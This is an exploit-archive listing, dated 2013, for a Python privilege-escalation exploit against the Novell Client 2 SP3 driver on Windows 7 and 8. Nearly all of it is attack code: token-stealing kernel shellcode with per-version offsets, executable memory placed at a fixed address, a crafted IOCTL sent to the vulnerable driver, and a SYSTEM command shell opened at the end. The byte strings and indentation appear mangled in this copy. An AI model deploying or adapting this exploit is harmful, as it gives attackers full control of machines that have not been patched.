[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell Client 2 SP3 Privilege Escalation Exploit
# Published : 2013-07-29
# Author :
# Previous Title : MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
# Next Title : Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow
# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
from ctypes import *
import sys,struct,os
from optparse import OptionParser
kernel32 = windll.kernel32
ntdll = windll.ntdll
if __name__ == '__main__':
usage = "%prog -o <target>"
parser = OptionParser(usage=usage)
parser.add_option("-o", type="string",
action="store", dest="target_os",
help="Available target operating systems: WIN7, WIN8")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['WIN7','WIN8']:
parser.print_help()
sys.exit()
OS = OS.upper()
if OS == "WIN7":
_KPROCESS = "x50" # Offset for Win7
_TOKEN = "xf8" # Offset for Win7
_UPID = "xb4" # Offset for Win7
_APLINKS = "xb8" # Offset for Win7
steal_token = "x52" +
"x53" +
"x33xc0" +
"x64x8bx80x24x01x00x00" +
"x8bx40" + _KPROCESS +
"x8bxc8" +
"x8bx98" + _TOKEN + "x00x00x00" +
"x89x1dx00x09x02x00" +
"x8bx80" + _APLINKS + "x00x00x00" +
"x81xe8" + _APLINKS + "x00x00x00" +
"x81xb8" + _UPID + "x00x00x00x04x00x00x00" +
"x75xe8" +
"x8bx90" + _TOKEN + "x00x00x00" +
"x8bxc1" +
"x89x90" + _TOKEN + "x00x00x00" +
"x5b" +
"x5a" +
"xc2x08"
sc = steal_token
else:
_KPROCESS = "x80" # Offset for Win8
_TOKEN = "xEC" # Offset for Win8
_UPID = "xB4" # Offset for Win8
_APLINKS = "xB8" # Offset for Win8
steal_token = "x52" +
"x53" +
"x33xc0" +
"x64x8bx80x24x01x00x00" +
"x8bx80" + _KPROCESS + "x00x00x00"+
"x8bxc8" +
"x8bx98" + _TOKEN + "x00x00x00" +
"x8bx80" + _APLINKS + "x00x00x00" +
"x81xe8" + _APLINKS + "x00x00x00" +
"x81xb8" + _UPID + "x00x00x00x04x00x00x00" +
"x75xe8" +
"x8bx90" + _TOKEN + "x00x00x00" +
"x8bxc1" +
"x89x90" + _TOKEN + "x00x00x00" +
"x5b" +
"x5a" +
"xc2x08"
sc = steal_token
kernel_sc = "x14x00x0dx0d"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x18x00x0dx0d"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x41x41x41x41"
kernel_sc+= "x28x00x0dx0d"
kernel_sc+= sc
print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print "[>] Finding the driver."
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE = '\\.\nicm'
device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
retn = c_ulong()
inut_buffer = 0x0d0d0000
inut_size = 0x14
output_buffer = 0x0
output_size = 0x0
baseadd = c_int(0x0d0d0000)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zero_Bits = c_int(0)
RegionSize = c_int(0x1000)
write = c_int(0)
print "[>] Allocating memory for our shellcode."
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
print "[>] Writing the shellcode."
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))
if device_handler:
print "[>] Sending IOCTL to the driver."
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
print "[>] Dropping to a SYSTEM shell."
os.system("cmd.exe /K cd C:\windows\system32")